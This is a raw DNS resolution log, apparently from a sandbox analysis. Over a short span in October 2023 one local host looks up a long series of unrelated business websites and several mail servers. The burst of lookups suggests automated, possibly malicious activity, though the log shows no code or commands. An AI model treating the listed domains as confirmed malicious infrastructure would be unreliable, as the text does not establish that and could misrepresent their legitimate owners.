                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.232656956 CEST1.1.1.1192.168.2.30xafd8No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.232656956 CEST1.1.1.1192.168.2.30xafd8No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.232656956 CEST1.1.1.1192.168.2.30xafd8No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.403947115 CEST1.1.1.1192.168.2.30x6558No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.403985977 CEST1.1.1.1192.168.2.30x6558No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.418891907 CEST1.1.1.1192.168.2.30x6558No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.796049118 CEST1.1.1.1192.168.2.30x1bfdNo error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:08.101267099 CEST1.1.1.1192.168.2.30x863eNo error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:08.101267099 CEST1.1.1.1192.168.2.30x863eNo error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:08.112968922 CEST1.1.1.1192.168.2.30x3a73No error (0)www.wifi4all.nl104.21.42.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:08.112968922 CEST1.1.1.1192.168.2.30x3a73No error (0)www.wifi4all.nl172.67.198.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:08.235332966 CEST1.1.1.1192.168.2.30x3a58No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:08.235332966 CEST1.1.1.1192.168.2.30x3a58No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:08.286869049 CEST1.1.1.1192.168.2.30x1ce4No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:08.828751087 CEST1.1.1.1192.168.2.30xc5cbNo error (0)www.fcwcvt.org104.21.25.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:08.828751087 CEST1.1.1.1192.168.2.30xc5cbNo error (0)www.fcwcvt.org172.67.134.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.164324999 CEST1.1.1.1192.168.2.30x2bc3No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.145812035 CEST1.1.1.1192.168.2.30x2bc3No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.227207899 CEST1.1.1.1192.168.2.30xf81aName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.228004932 CEST1.1.1.1192.168.2.30xd7a7No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.228931904 CEST1.1.1.1192.168.2.30xd7a7No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.504621983 CEST1.1.1.1192.168.2.30xc683No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.504621983 CEST1.1.1.1192.168.2.30xc683No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.504621983 CEST1.1.1.1192.168.2.30xc683No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.524941921 CEST1.1.1.1192.168.2.30x349aNo error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.556514025 CEST1.1.1.1192.168.2.30x6eb0No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.771023989 CEST1.1.1.1192.168.2.30xe4a7No error (0)www.snugpak.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.771023989 CEST1.1.1.1192.168.2.30xe4a7No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.121190071 CEST1.1.1.1192.168.2.30x8af2No error (0)www.netcr.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.121190071 CEST1.1.1.1192.168.2.30x8af2No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.121190071 CEST1.1.1.1192.168.2.30x8af2No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.121190071 CEST1.1.1.1192.168.2.30x8af2No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.225245953 CEST1.1.1.1192.168.2.30x77bServer failure (2)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.541179895 CEST1.1.1.1192.168.2.30xdb99No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.583702087 CEST1.1.1.1192.168.2.30x15c2No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.590775013 CEST1.1.1.1192.168.2.30xdb65No error (0)www.nelipak.nlnelipak.nlCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.590775013 CEST1.1.1.1192.168.2.30xdb65No error (0)nelipak.nl91.210.235.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.590794086 CEST1.1.1.1192.168.2.30xdb65No error (0)www.nelipak.nlnelipak.nlCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.590794086 CEST1.1.1.1192.168.2.30xdb65No error (0)nelipak.nl91.210.235.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.688944101 CEST1.1.1.1192.168.2.30x4b80No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.758663893 CEST1.1.1.1192.168.2.30x7e89No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.827728987 CEST1.1.1.1192.168.2.30x933bNo error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.475272894 CEST1.1.1.1192.168.2.30x2e62No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.475272894 CEST1.1.1.1192.168.2.30x2e62No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.475272894 CEST1.1.1.1192.168.2.30x2e62No error (0)d2kt7vovxa5e81.cloudfront.net13.33.21.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.475272894 CEST1.1.1.1192.168.2.30x2e62No error (0)d2kt7vovxa5e81.cloudfront.net13.33.21.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.475272894 CEST1.1.1.1192.168.2.30x2e62No error (0)d2kt7vovxa5e81.cloudfront.net13.33.21.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.475272894 CEST1.1.1.1192.168.2.30x2e62No error (0)d2kt7vovxa5e81.cloudfront.net13.33.21.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.534600973 CEST1.1.1.1192.168.2.30xbedfNo error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.534600973 CEST1.1.1.1192.168.2.30xbedfNo error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.678564072 CEST1.1.1.1192.168.2.30x4202No error (0)www.tyrns.com217.79.184.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.784424067 CEST1.1.1.1192.168.2.30xe4a7No error (0)www.dayvo.com104.21.68.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.784424067 CEST1.1.1.1192.168.2.30xe4a7No error (0)www.dayvo.com172.67.184.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.908756971 CEST1.1.1.1192.168.2.30xa2dNo error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.996690989 CEST1.1.1.1192.168.2.30x8f5dNo error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.386965036 CEST1.1.1.1192.168.2.30xe3d8No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.618170977 CEST1.1.1.1192.168.2.30xb1c8No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.780294895 CEST1.1.1.1192.168.2.30x2501No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.321597099 CEST1.1.1.1192.168.2.30xc516No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.321597099 CEST1.1.1.1192.168.2.30xc516No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.540627956 CEST1.1.1.1192.168.2.30x9a10No error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.540627956 CEST1.1.1.1192.168.2.30x9a10No error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:15.267047882 CEST1.1.1.1192.168.2.30xc7caNo error (0)www.x0c.com104.247.81.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:15.326733112 CEST1.1.1.1192.168.2.30x8317No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:15.660712957 CEST1.1.1.1192.168.2.30x2bf9No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:15.804678917 CEST1.1.1.1192.168.2.30x8b4dNo error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.191400051 CEST1.1.1.1192.168.2.30xdf07No error (0)www.tc17.com104.21.79.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.191400051 CEST1.1.1.1192.168.2.30xdf07No error (0)www.tc17.com172.67.150.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.551305056 CEST1.1.1.1192.168.2.30x7f7Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.060376883 CEST1.1.1.1192.168.2.30xb039No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.060376883 CEST1.1.1.1192.168.2.30xb039No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.060376883 CEST1.1.1.1192.168.2.30xb039No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.060376883 CEST1.1.1.1192.168.2.30xb039No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.060376883 CEST1.1.1.1192.168.2.30xb039No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.0.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.862076998 CEST1.1.1.1192.168.2.30xa7c8No error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.039136887 CEST1.1.1.1192.168.2.30x13e5No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.144710064 CEST1.1.1.1192.168.2.30x13e5No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.639070034 CEST1.1.1.1192.168.2.30x1bdfNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.047677040 CEST1.1.1.1192.168.2.30x93dName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.973485947 CEST1.1.1.1192.168.2.30xd214No error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.973485947 CEST1.1.1.1192.168.2.30xd214No error (0)d2r2uj0bnofxxz.cloudfront.net13.33.21.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.973485947 CEST1.1.1.1192.168.2.30xd214No error (0)d2r2uj0bnofxxz.cloudfront.net13.33.21.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.973485947 CEST1.1.1.1192.168.2.30xd214No error (0)d2r2uj0bnofxxz.cloudfront.net13.33.21.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.973485947 CEST1.1.1.1192.168.2.30xd214No error (0)d2r2uj0bnofxxz.cloudfront.net13.33.21.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.917088032 CEST1.1.1.1192.168.2.30x11a8No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.319303989 CEST1.1.1.1192.168.2.30xd7f5No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.319303989 CEST1.1.1.1192.168.2.30xd7f5No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.319303989 CEST1.1.1.1192.168.2.30xd7f5No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.572734118 CEST1.1.1.1192.168.2.30xa63dNo error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.572734118 CEST1.1.1.1192.168.2.30xa63dNo error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.636048079 CEST1.1.1.1192.168.2.30x387eName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.370572090 CEST1.1.1.1192.168.2.30x1d29No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.370572090 CEST1.1.1.1192.168.2.30x1d29No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.601950884 CEST1.1.1.1192.168.2.30x1facName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.807806969 CEST1.1.1.1192.168.2.30x946No error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.807806969 CEST1.1.1.1192.168.2.30x946No error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.440130949 CEST1.1.1.1192.168.2.30x28b6No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.440130949 CEST1.1.1.1192.168.2.30x28b6No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.456130981 CEST1.1.1.1192.168.2.30x8af8No error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.456130981 CEST1.1.1.1192.168.2.30x8af8No error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:31.262336016 CEST1.1.1.1192.168.2.30x1f9aNo error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:32.542299032 CEST1.1.1.1192.168.2.30x4603No error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:33.148004055 CEST1.1.1.1192.168.2.30x7d9No error (0)smtp.compuserve.comeast.us.smtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:33.148004055 CEST1.1.1.1192.168.2.30x7d9No error (0)east.us.smtp.aol.comsmtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:33.148004055 CEST1.1.1.1192.168.2.30x7d9No error (0)smtp.aol.comsmtp.cs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:33.148004055 CEST1.1.1.1192.168.2.30x7d9No error (0)smtp.cs.comsmtp.aol.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:33.148004055 CEST1.1.1.1192.168.2.30x7d9No error (0)smtp.aol.g03.yahoodns.net67.195.12.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:34.354944944 CEST1.1.1.1192.168.2.30x8557No error (0)www.rs-ag.com172.67.152.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:34.354944944 CEST1.1.1.1192.168.2.30x8557No error (0)www.rs-ag.com104.21.1.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:34.677881002 CEST1.1.1.1192.168.2.30x9bdbNo error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:34.688430071 CEST1.1.1.1192.168.2.30x62a0Server failure (2)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:36.488055944 CEST1.1.1.1192.168.2.30x34c5No error (0)www.railbook.net103.224.212.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:36.807696104 CEST1.1.1.1192.168.2.30x44b8No error (0)www.vazir.se34.94.160.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:36.807713985 CEST1.1.1.1192.168.2.30x44b8No error (0)www.vazir.se34.94.160.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:36.895040989 CEST1.1.1.1192.168.2.30x44b8No error (0)www.vazir.se34.94.160.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:37.823690891 CEST1.1.1.1192.168.2.30x7a82No error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:38.858020067 CEST1.1.1.1192.168.2.30x89d6No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:39.260464907 CEST1.1.1.1192.168.2.30x293No error (0)www.cokocoko.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:39.260464907 CEST1.1.1.1192.168.2.30x293No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:39.260464907 CEST1.1.1.1192.168.2.30x293No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:39.260464907 CEST1.1.1.1192.168.2.30x293No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:40.676999092 CEST1.1.1.1192.168.2.30xffccServer failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:40.677186012 CEST1.1.1.1192.168.2.30xffccServer failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:40.677197933 CEST1.1.1.1192.168.2.30xffccServer failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:40.677248001 CEST1.1.1.1192.168.2.30xffccServer failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:40.937674046 CEST1.1.1.1192.168.2.30x87cNo error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:41.798261881 CEST1.1.1.1192.168.2.30x4f16No error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:41.798261881 CEST1.1.1.1192.168.2.30x4f16No error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:42.669414043 CEST1.1.1.1192.168.2.30xc741No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:44.660656929 CEST1.1.1.1192.168.2.30x83d2No error (0)gmail-smtp-in.l.google.com74.125.137.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:44.716422081 CEST1.1.1.1192.168.2.30x3170No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:44.716422081 CEST1.1.1.1192.168.2.30x3170No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:44.716422081 CEST1.1.1.1192.168.2.30x3170No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:45.465452909 CEST1.1.1.1192.168.2.30x6025No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:45.465452909 CEST1.1.1.1192.168.2.30x6025No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:46.283601999 CEST1.1.1.1192.168.2.30xec63Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.650187969 CEST1.1.1.1192.168.2.30x3d80Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.899390936 CEST1.1.1.1192.168.2.30xc2d4No error (0)www.fnsds.orgexpired.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.899390936 CEST1.1.1.1192.168.2.30xc2d4No error (0)expired.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.899390936 CEST1.1.1.1192.168.2.30xc2d4No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.211.34.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.899390936 CEST1.1.1.1192.168.2.30xc2d4No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com18.214.129.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.629127979 CEST1.1.1.1192.168.2.30x8ef5No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.629127979 CEST1.1.1.1192.168.2.30x8ef5No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.492124081 CEST1.1.1.1192.168.2.30xcfbbNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.492124081 CEST1.1.1.1192.168.2.30xcfbbNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.492150068 CEST1.1.1.1192.168.2.30xb6fbNo error (0)sjbmw.com164.92.82.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.494146109 CEST1.1.1.1192.168.2.30xbbe7No error (0)k-nikko.com13.113.204.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.494146109 CEST1.1.1.1192.168.2.30xbbe7No error (0)k-nikko.com18.179.184.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.518347025 CEST1.1.1.1192.168.2.30xdf30Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.538135052 CEST1.1.1.1192.168.2.30x2ea9No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.579760075 CEST1.1.1.1192.168.2.30xb430No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.600394964 CEST1.1.1.1192.168.2.30x9040No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.703468084 CEST1.1.1.1192.168.2.30x39f6No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
